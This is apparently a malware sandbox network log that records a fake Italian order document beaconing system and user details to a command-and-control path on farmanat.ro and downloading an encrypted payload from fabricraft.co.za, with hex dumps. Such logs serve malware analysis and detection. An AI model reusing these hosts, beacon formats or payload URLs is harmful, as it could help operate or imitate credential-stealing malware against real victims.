                                              Nov 25, 2021 10:48:58.604841948 CET6445OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:58.639270067 CET6445OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:58.692387104 CET6446INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:57 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              95192.168.11.2049932176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:59.185833931 CET6446OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:59.219633102 CET6446OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:59.272428989 CET6447INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              96192.168.11.2049933176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:59.754446983 CET6448OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:59.788669109 CET6448OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:59.838318110 CET6448INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:58 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              97192.168.11.2049934176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:00.325952053 CET6449OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:00.359715939 CET6449OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:00.411487103 CET6450INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              98192.168.11.2049935176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:00.885502100 CET6450OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:00.919723988 CET6451OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:00.972506046 CET6451INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:59 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              99192.168.11.2049936176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:49:01.341392994 CET6452OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:49:01.374974012 CET6452OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:49:01.424958944 CET6452INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:49:00 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049816197.242.150.64443C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-11-25 09:47:51 UTC0OUTGET /Farmant_hhVNwJna195.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: fabricraft.co.za
                                              Cache-Control: no-cache
                                              2021-11-25 09:47:52 UTC0INHTTP/1.1 200 OK
                                              Date: Thu, 25 Nov 2021 09:47:52 GMT
                                              Server: Apache
                                              Last-Modified: Thu, 25 Nov 2021 06:28:40 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 106560
                                              Connection: close
                                              Content-Type: application/octet-stream
                                              2021-11-25 09:47:52 UTC0INData Raw: ed 7e 33 eb 0b f2 69 6c a4 98 d3 1b d6 98 37 1d 0c 20 ef 35 e8 89 f1 a3 7c 14 c7 cf a7 4d 4c e8 36 7e d8 3c cd 58 d3 5f 09 57 2e 48 ce a9 39 16 0d 52 f8 98 88 61 3a 2d e3 5b 64 93 4c a9 6d 0c 86 ff aa fd f5 30 7d b5 cd b2 9c f9 c3 d5 57 4c b4 75 04 bc 04 97 ae 74 53 9d 58 ce 61 2f 31 8a e6 bf e3 93 25 c3 df 62 57 45 6f 2a 2f 30 1f c8 c3 e1 2c 16 ef 74 29 5e f0 1f ee bb 72 4a 9a 4a c2 b7 bd 80 5d 1f 1a bc ef 13 b2 80 49 64 aa ec b9 23 69 8f 5b 4d 69 24 15 f9 fa 5e a8 c4 a7 b6 5a 46 e6 9a cf fb 29 ae f4 d0 18 ce 7e 25 97 49 ef a8 e3 9a c4 06 84 9e a5 45 db 8c 94 af 81 6b 37 3b b7 bc fe 89 11 d0 e1 ed 9b 5e ba be 9a 73 ce 69 5c 98 ce de a1 eb c5 33 75 53 df 76 c4 dd 34 2f ca 7c 23 2c 76 f7 88 52 15 90 ec df 96 ea c9 7b 97 b8 f6 cc fe 5b e3 24 9b 35 7f af 15
                                              Data Ascii: ~3il7 5|ML6~<X_W.H9Ra:-[dLm0}WLutSXa/1%bWEo*/0,t)^rJJ]Id#i[Mi$^ZF)~%IEk7;^si\3uSv4/|#,vR{[$5
                                              2021-11-25 09:47:52 UTC8INData Raw: 21 68 b1 cb d4 a1 48 4c 09 ba bc 99 8b cc a9 5f 66 b5 d3 15 ce b9 70 ee 6a 94 11 4a 96 2d 04 7f 52 c9 2c 88 5b 51 e3 c4 b2 3e 77 31 63 92 2b c1 23 9c a9 00 c5 7b 17 56 56 96 c5 e4 37 c9 9c 9a 0e 78 5f c8 c2 7c 58 e4 0b 91 3c 29 49 a9 cc 8c db 0e 4f b8 92 a8 a4 20 ad b1 b6 da c9 e0 79 30 a2 f0 36 95 10 dd 90 86 e8 78 a7 18 76 70 fb 38 9a 32 50 1c 10 fa 59 79 fa c6 df a6 47 60 50 0f a7 be 75 4e 0d 09 82 19 60 ed 1a 51 96 99 9b 35 b6 f2 c8 f2 02 59 d1 64 70 d7 43 62 f2 5c d6 11 38 07 e4 13 ae 33 68 55 1e 54 0d c1 b8 a4 ca 90 62 d7 0d 4b 2d d0 60 31 7c fe 01 50 b9 24 13 92 91 1c 28 fa 54 e4 ae 86 a9 d2 74 0a e2 ee 66 48 63 d9 66 19 d5 d7 73 aa 32 ad 65 e6 47 0c 50 4f fb 64 5c 02 f2 f8 81 b0 e9 73 56 1e 59 fb 13 46 9c 46 8a 12 2f 91 f0 6c 3e 10 1f be f6 a5 f8
                                              Data Ascii: !hHL_fpjJ-R,[Q>w1c+#{VV7x_|X<)IO y06xvp82PYyG`PuN`Q5YdpCb\83hUTbK-`1|P$(TtfHcfs2eGPOd\sVYFF/l>
                                              2021-11-25 09:47:52 UTC15INData Raw: b6 4e db 15 f4 c1 27 a1 f8 14 95 b4 9a 7d f6 9c e9 4e 84 20 58 98 4a 6b ee c1 57 c9 aa 75 a2 75 6b 3a 17 c5 76 29 76 f8 79 08 ec f4 7f a4 49 e6 c9 eb f4 03 a8 96 07 6f 03 a8 5e e4 78 ff 66 0f c2 f8 02 f8 ca 42 9c fb 56 0b da 7e 5f 52 0e 61 a8 0e 03 fc 6f 9f 97 93 f8 e8 f4 99 15 d8 57 dc 3a ab 79 f5 87 87 1a 7f a3 4b 3f c1 a4 46 51 eb aa 4b 9a 3d c3 ae 12 5d 1b b2 24 c8 91 c8 ff a0 8a d5 2c 68 6a 75 b8 d9 14 bc 27 38 d6 1f a6 bb 9b 9c 2d a9 e8 b1 02 ea 0a 12 cb a0 1c 86 ec d9 4a d5 69 60 29 86 8a 7a f3 e7 e3 d7 15 9f 51 aa 66 4e 16 f3 28 43 2f 1a 9c 9f e5 33 db ca a7 0b 72 2f a2 41 06 6a 42 57 b3 ee 04 2c e3 e4 b1 4c 1d 49 b8 db 45 5f 15 55 df ba 9a fb 6c 89 59 c3 47 7a 38 a0 5d 2f 87 21 dc b8 d3 bd 82 c0 c2 e6 f4 1f 3f 3a b3 3a 71 f0 02 42 63 2a 56 7e b0
                                              Data Ascii: N'}N XJkWuuk:v)vyIo^xfBV~_RaoW:yK?FQK=]$,hju'8-Ji`)zQfN(C/3r/AjBW,LIE_UlYGz8]/!?::qBc*V~
                                              2021-11-25 09:47:52 UTC23INData Raw: 1a 32 73 ea 7e 6a 13 e0 7b 55 09 15 32 79 51 18 eb 63 e0 4b eb 5f f9 ed e9 48 19 0b 57 fb 31 47 34 14 bf d7 20 fa f2 7e e4 7d b5 c9 d8 fc 74 79 ae 58 1b cc 1f 04 ec 62 98 bd f1 6f 62 a7 31 89 86 f0 75 19 d5 e3 f9 4d 4e 5a 1e a8 ba 90 b3 7d 60 e0 bd 3f 1e 59 ee bc 9c 49 53 f0 1f 6d 7f aa cf 5a 45 44 30 07 8e 5d 28 2c 71 bb a4 db dc 86 45 fe 6c 70 8c b6 00 a2 57 02 bd 66 1f af 31 44 2c d9 db 2e 66 d4 00 d8 61 88 1c 2b 46 2f 67 3d 65 73 2c 56 9e 1e ad ba 80 8e 97 47 dc 89 dc 6b da 61 94 8e 2a 9c aa 64 28 07 7d ea 85 91 76 f2 6a c2 55 40 36 8c 99 b8 37 43 cf 0a 9e 36 fc 55 da 59 35 09 06 57 df a6 82 60 5a 34 a6 f6 3f 67 73 0b 02 ad 5c d4 e5 f9 a0 f8 7d 2f 0c 91 ed fa 80 d1 96 d7 22 07 5c 87 b3 f5 42 82 cf 78 1a bf 18 21 43 9f b4 1a b2 3a 9e b9 af f0 5f e6 45
                                              Data Ascii: 2s~j{U2yQcK_HW1G4 ~}tyXbob1uMNZ}`?YISmZED0](,qElpWf1D,.fa+F/g=es,VGka*d(}vjU@67C6UY5W`Z4?gs\}/"\Bx!C:_E
                                              2021-11-25 09:47:52 UTC31INData Raw: 89 a1 ab 99 7f 3b a4 81 c8 57 99 7d d3 a2 94 5d 5a 22 8b 84 8d d2 6d c0 7d 9d 53 f0 4c ed 52 ac eb e7 ad 47 a5 0a 43 66 f8 ce 53 7e eb da 06 ba e4 72 27 59 5c 8b 11 14 54 7e bf 89 b3 d2 80 a6 33 41 b0 8a 5e 3a b4 3a 12 0f 7a e1 58 fb e7 f2 b0 97 a5 4d a8 0e 6b b0 ad d2 a5 de 10 9a a0 27 79 58 f5 4c b2 f0 05 eb dc 93 98 fe a0 ab e4 3f ac ac 9a 52 a6 50 0e 6b 50 a9 7a 6f 48 f6 e2 54 62 d4 19 2c 6e a2 20 7b a0 5c 97 51 f9 05 80 c0 0e 2e 26 43 62 ad 74 e9 25 90 e6 55 32 47 10 4a ee ff c0 4f 11 3f 52 18 53 b1 e3 a4 62 14 38 06 92 b0 db 40 2a b9 52 11 32 91 38 c9 8d ef 1d 95 1d a6 fd b0 36 aa b7 88 58 53 6f 9e 58 6c f1 60 c1 bb 96 d9 05 01 1a 7a 02 c2 fe e2 b5 5a 88 b1 88 f6 ae fb 10 be 04 e2 53 cb 2e f0 55 06 0b f0 3c 82 e5 b4 5f ec 9c 66 fa 62 37 30 b9 0b 4a
                                              Data Ascii: ;W}]Z"m}SLRGCfS~r'Y\T~3A^::zXMk'yXL?RPkPzoHTb,n {\Q.&Cbt%U2GJO?RSb8@*R286XSoXl`zZS.U<_fb70J
                                              2021-11-25 09:47:52 UTC39INData Raw: 78 b7 b5 20 50 41 0b f8 be 4c ca fa da b8 3a 74 9a 76 a2 3f 40 d6 ab c4 15 7c a5 60 8e 1e 70 ee 36 77 0e 14 78 a0 ec fc 60 58 9a 47 d9 ae 84 c2 0a 27 48 ea e0 8c 4c ae 40 5d 12 ab 6f 69 a4 8a d4 cd 23 d4 00 29 70 bf 59 a8 5b 32 1c 29 d1 d9 e2 f8 11 83 93 a9 23 07 40 61 2d 31 17 c5 18 23 3a 86 66 25 ad 22 d9 58 53 8d bb 6e 05 b9 0b 0c bd a7 2b 77 a3 71 b6 2e 0f ec 92 80 da 42 98 20 a7 26 a4 bc f1 2f 62 35 f4 95 bd 5e e3 be 21 3c 77 64 9b d9 e0 45 19 20 48 dd 6c 29 c1 a3 9a 3e e8 c4 a1 55 4f af 32 0e 2f 2b fe fd 47 0a 5a de 01 37 c2 95 e4 e0 ae ce ff 1f 47 00 b9 f0 48 24 57 32 d0 17 86 2c e1 43 9c dc b5 81 f6 ed b7 ca 7f 9b 01 2c 5d a9 92 16 80 ee b7 72 f3 00 71 d6 74 ce 03 7c 4c 37 96 4c a7 55 4f 25 66 4c 8d 4e 33 96 85 48 4f 21 15 8c 9c 77 b6 a0 c0 b0 d0
                                              Data Ascii: x PAL:tv?@|`p6wx`XG'HL@]oi#)pY[2)#@a-1#:f%"XSn+wq.B &/b5^!<wdE Hl)>UO2/+GZ7GH$W2,C,]rqt|L7LUO%fLN3HO!w
                                              2021-11-25 09:47:52 UTC47INData Raw: dc 58 26 15 75 31 8a 65 7b ef 50 70 48 33 e3 bb f1 6f 2a 2f 63 49 37 b6 e9 1f e0 28 f1 59 a1 0f e0 f3 17 2a b2 5d cf b8 57 f8 71 8e 13 5b 4f 09 2e cb 33 7b ba b6 f9 ee 5a 8e 7a 55 dd f1 a9 16 93 07 1b 0e ef 49 3f 49 e7 87 38 aa 0d bb 72 c7 1c b1 ab b2 da bd 87 cd 00 c2 73 e5 4a 9c 79 46 00 4b f7 80 23 64 ac be 62 84 04 7b e4 c0 38 f1 cf 73 25 d5 d5 c9 42 68 c8 cf be 80 37 17 0f 8e 4c 31 39 10 7e e2 d0 27 72 14 94 02 89 e5 ab 7d a7 a3 91 cd 06 41 4f 86 92 31 10 03 61 0a 31 27 44 8f 40 59 83 c4 d3 e4 6f 9f 6c 06 ff f5 1a f8 af a0 38 90 b4 ff 93 6f 2a d7 bf f4 0f 4c 2e fa 10 de ff 74 58 5a c6 15 13 e7 fc 92 d5 9a 34 bf 20 fa fe ea f3 e7 bf ca 47 52 2d 42 3f 55 61 3f 78 1c 65 90 7d 73 42 a4 63 f2 31 27 31 2f 4f 37 4f a9 24 84 46 9b d3 23 9a 7f 3b b8 0a 96 0f
                                              Data Ascii: X&u1e{PpH3o*/cI7(Y*]Wq[O.3{ZzUI?I8rsJyFK#db{8s%Bh7L19~'r}AO1a1'D@Yol8o*L.tXZ4 GR-B?Ua?xe}sBc1'1/O7O$F#;
                                              2021-11-25 09:47:52 UTC55INData Raw: c5 c6 4d a8 a6 bf 62 a5 de e1 1e 22 05 e8 93 77 28 41 ba fa 57 37 33 3f 12 5b 08 98 3b 8e 1f 8d 20 e0 f3 51 f0 f5 58 b6 27 53 e8 9a 14 fc 30 6f 26 32 d4 7b 71 f4 f0 9c 04 d5 b8 10 83 ce 0f a8 80 b3 8b 08 85 a5 de e4 2b 01 f3 54 34 09 e1 9d 10 49 47 08 5b f5 7d c9 2e 31 12 6f ed 7f 7f 23 90 1c 03 3f 73 aa 66 39 93 c8 6a ca b7 43 24 6c 37 77 b7 07 09 32 60 de 5c 03 3d 89 2c d9 b6 1b 32 fc ba 97 a1 c3 74 f5 30 a7 10 1b c1 83 89 7e ca ed 97 01 69 b9 0f af cd 33 37 5c 71 f2 94 99 db d3 67 e9 1f 11 e0 e2 7a 0a a1 ca 29 6e 52 cb a6 b6 22 77 a5 f4 88 59 5d ec 9c d6 a4 d3 ae 46 9d 41 14 95 b4 b7 07 68 8f 6c 34 91 d7 58 b7 4f c2 d2 2c 32 b3 bd 82 b5 31 cc af b4 fa a2 6e 16 07 d3 7c 58 c3 d7 48 3f 9c 5c 41 80 10 a1 ad 37 5f dd 93 3a 19 87 00 68 8d ba 7f 74 82 2f 45
                                              Data Ascii: Mb"w(AW73?[; QX'S0o&2{q+T4IG[}.1o#?sf9jC$l7w2`\=,2t0~i37\qgz)nR"wY]FAhl4XO,21n|XH?\A7_:ht/E
                                              2021-11-25 09:47:52 UTC62INData Raw: e8 04 f4 a5 98 ef 2a d4 95 29 15 3b fd 1a 32 b9 df 76 d5 99 e2 10 ee 16 e9 2e bf f8 d5 e2 ae 60 8f fd a8 ff 37 30 99 cd 07 f4 69 60 55 c9 0d c7 12 65 2e f3 0a 39 25 b6 a9 de a1 66 56 37 35 1e da 35 1a d8 0f ce 6b 1d 4d 17 be 32 47 9a 1d 09 66 7e 18 fc a2 1c dd 03 e0 3f a4 d0 b9 f6 01 1a 12 a3 9a 5d b2 2c 32 ab 35 c8 9d aa 5b 87 2e b3 49 cd b5 42 9d cd 55 3b 67 a1 ef 63 7b d7 b1 7b 07 0f 77 ca 8d f5 55 80 b0 50 da 54 59 3c 8f 86 23 15 11 5d b8 1f 40 1f c8 6f 7f ea f2 50 48 d3 30 97 2d 11 c2 be 76 47 ab 73 55 26 e2 f8 cf f9 f0 37 33 7d 12 9c 17 8f ca aa 23 f0 a7 07 d2 53 ef 77 3f 80 30 5e 74 55 fc 8a 1b 13 21 eb 06 31 3c 7d 15 0f 9b d5 67 56 47 5e 95 13 0b 21 7b fd 9c 31 15 69 4d f3 9c 11 3a 30 57 4c 3f b5 87 78 1c d7 6d 21 98 71 32 c4 38 a4 74 82 7f 48 1a
                                              Data Ascii: *);2v.`70i`Ue.9%fV755kM2Gf~?],25[.IBU;gc{{wUPTY<#]@oPH0-vGsU&73}#Sw?0^tU!1<}gVG^!{1iM:0WL?xm!q28tH
                                              2021-11-25 09:47:52 UTC70INData Raw: 2b e6 a8 78 6b 25 c2 bc a6 36 ac 26 99 54 a2 2c dc d7 2c e7 79 26 be 52 c6 3b 64 5f 97 6f 1d e6 f4 76 6b f4 5d 24 f9 80 50 f4 7b 04 83 c3 bd 03 2d f8 ad 34 82 d8 78 de 93 60 ca 4e bd c9 5f 47 18 b7 2e dd f7 6b 1c 3f db 15 f5 55 71 2c 2e be 81 60 5a 5d cc ea c2 98 fe 0d ab bf 28 7e 44 85 b0 db 36 e1 4d e8 66 09 fc 06 99 c9 97 bf ec 92 65 73 f3 7d 2b a2 1e 01 a6 0c 43 e9 36 dd f1 cc 33 b9 e5 4e b3 e6 ed eb 82 38 cd 18 3e c8 39 59 6e c7 5c 74 9a d5 1d 0c 75 0b 12 81 c5 26 54 b9 cd e6 6b 6c 82 8e 34 e3 d2 ca fb 48 a1 3c 9d 08 24 c3 0e ee e1 19 1b 90 c8 77 74 90 45 3d be 24 56 37 22 61 45 23 5a 81 85 5a dd 76 7b f8 7d 09 61 56 db 10 3d 63 1d 52 0e 54 e7 ad 35 5d 06 56 e2 11 60 21 70 db 37 12 4c 4a 50 8c 3c 7f 69 bf 66 80 05 81 29 12 08 36 ad 0f c4 b2 23 f0 d7
                                              Data Ascii: +xk%6&T,,y&R;d_ovk]$P{-4x`N_G.k?Uq,.`Z](~D6Mfes}+C63N8>9Yn\tu&Tkl4H<$wtE=$V7"aE#ZZv{}aV=cRT5]V`!p7LJP<if)6#
                                              2021-11-25 09:47:52 UTC78INData Raw: 2f f2 1a da 59 a5 83 16 fb 33 47 92 1b 17 43 49 bf 91 97 5b 30 05 ca 8a 64 6d 48 a8 52 b9 8b 19 23 1b 09 42 b7 a5 9a 49 8f 49 f4 da ee 36 89 83 86 b1 12 b6 8a 87 c9 a4 ae a7 46 4c 3d 0f 30 2f b9 17 14 86 9c 1b 88 fd a6 4d fe a4 21 00 f9 b3 b7 e2 de 93 06 d2 78 cd d4 c0 a9 52 a1 3e 5e 65 bc 51 ec 15 42 d1 a7 49 1f 9e 1b e9 f8 b9 d5 bc 53 cb d8 cc b1 ff af f0 3c fe c9 11 49 00 09 8e 9d 76 12 dd e7 e0 81 6a 18 07 bf 1b 16 1a 32 35 38 4f b3 09 57 44 1a e8 de c9 69 b5 31 7c 3f f3 63 d4 bb 21 10 26 97 ff 56 7e 73 a9 e6 c9 ee 2c 07 07 d4 ab c6 ab 63 b2 b5 90 0a 23 18 2a e6 88 ef 12 52 29 6d 56 80 40 5d 80 da b5 d5 53 29 1c fc e5 ec 00 77 ab 8e f3 35 49 07 8e 84 73 16 13 ac 3c 34 31 93 a3 39 f1 f9 b5 d1 3d f6 fb a3 09 d1 49 5d 87 28 40 a5 4c 5e ae 42 bf 2b ac c1
                                              Data Ascii: /Y3GCI[0dmHR#BII6FL=0/M!xR>^eQBIS<Ivj258OWDi1|?c!&V~s,c#*R)mV@]S)w5Is<419=I](@L^B+
                                              2021-11-25 09:47:52 UTC86INData Raw: 73 ad ca 67 5f 89 6e b0 58 4b ab 48 b2 9d e7 cd 02 0f 42 25 e3 92 6c db f2 bd 6d 48 1f a3 fd 01 cc 46 e9 ee 37 3d 65 62 e1 a5 a1 e0 ca 5e c4 f1 d0 62 73 70 23 cd df 67 f7 bb 3d cf e4 a1 ef 79 7a cf b1 93 46 6a 9f 81 97 b6 55 dc 70 be 1e 3c 19 8a bc 32 73 20 41 47 80 c7 01 4f a2 1c 17 df 76 77 48 5e 7e ff 2d 74 f1 10 f5 e0 b3 56 96 3f e2 ce ca fa 90 d6 72 04 fa bd 0c e7 ca f8 e3 1a 63 65 92 be 85 07 55 ec 58 a7 f0 67 fc 16 36 08 21 eb 35 f1 bf b9 19 6a 58 cc 67 60 47 75 97 0b cb d5 3a 91 f6 55 7d 95 c9 f3 9c 89 3c 5a 57 20 0c 1c 04 df 04 f6 ae 00 13 f4 58 a1 61 41 31 aa e6 ec e3 e6 25 b3 df 12 57 2a 6f 58 2f 44 1f 94 c3 91 2c 7a ef 01 29 2a f0 76 ee d7 82 64 9a 2f cc d0 07 eb 5d ab 13 5f ce d3 b3 a1 84 29 fe 84 d0 50 49 d2 29 41 0e 39 74 fa da 4b c9 cf c9
                                              Data Ascii: sg_nXKHB%lmHF7=eb^bsp#g=yzFjUp<2s AGOvwH^~-tV?rceUXg6!5jXg`Gu:U}<ZW XaA1%W*oX/D,z)*vd/]_)PI)A9tK
                                              2021-11-25 09:47:52 UTC94INData Raw: 38 c2 62 6a 78 bf 57 ca 9f 56 1a 1d a0 81 fe b9 8f d3 d1 3c b0 67 2d 99 01 e8 d3 dd 22 89 de 58 13 ec 12 f5 94 82 86 57 55 7b 71 55 96 67 08 6e df 24 69 d3 80 6c df e8 2e 26 af df 28 ed 2b 4b 07 97 71 0c b7 e0 de 72 61 a1 5d 2d f7 d8 77 05 c4 15 2d 20 be 9f 58 30 14 93 63 9f c8 e4 fc f2 47 03 9e d7 e9 4f 49 b6 42 a6 97 73 3f e5 1d 2b d2 3a 87 20 dc a4 95 6b 95 36 1e 2d 6b 10 a8 20 c9 b9 6a 89 12 ce 34 fa 87 59 a8 9c af ad af 41 a4 e3 be 64 b8 7e 12 34 73 46 31 c8 fc 25 ba 83 2e 2b c6 f9 4d 03 d4 23 76 12 f5 92 f0 bf 80 8a 7c a4 4a 2c 01 6b cc 90 bf f7 58 93 09 70 3d da a3 7e 8d 01 13 85 c7 30 1c 77 d8 41 9f ec b9 f9 86 8e d7 01 58 83 56 da 70 af 42 96 56 a9 0f 35 1a f9 2e ad d7 e2 70 f1 90 e5 9b 52 9b 10 14 04 69 60 74 f5 46 de fb dc 17 05 30 4f b9 e4 7d
                                              Data Ascii: 8bjxWV<g-"XWU{qUgn$il.&(+Kqra]-w- X0cGOIBs?+: k6-k j4YAd~4sF1%.+M#v|J,kXp=~0wAXVpBV5.pRi`tF0O}
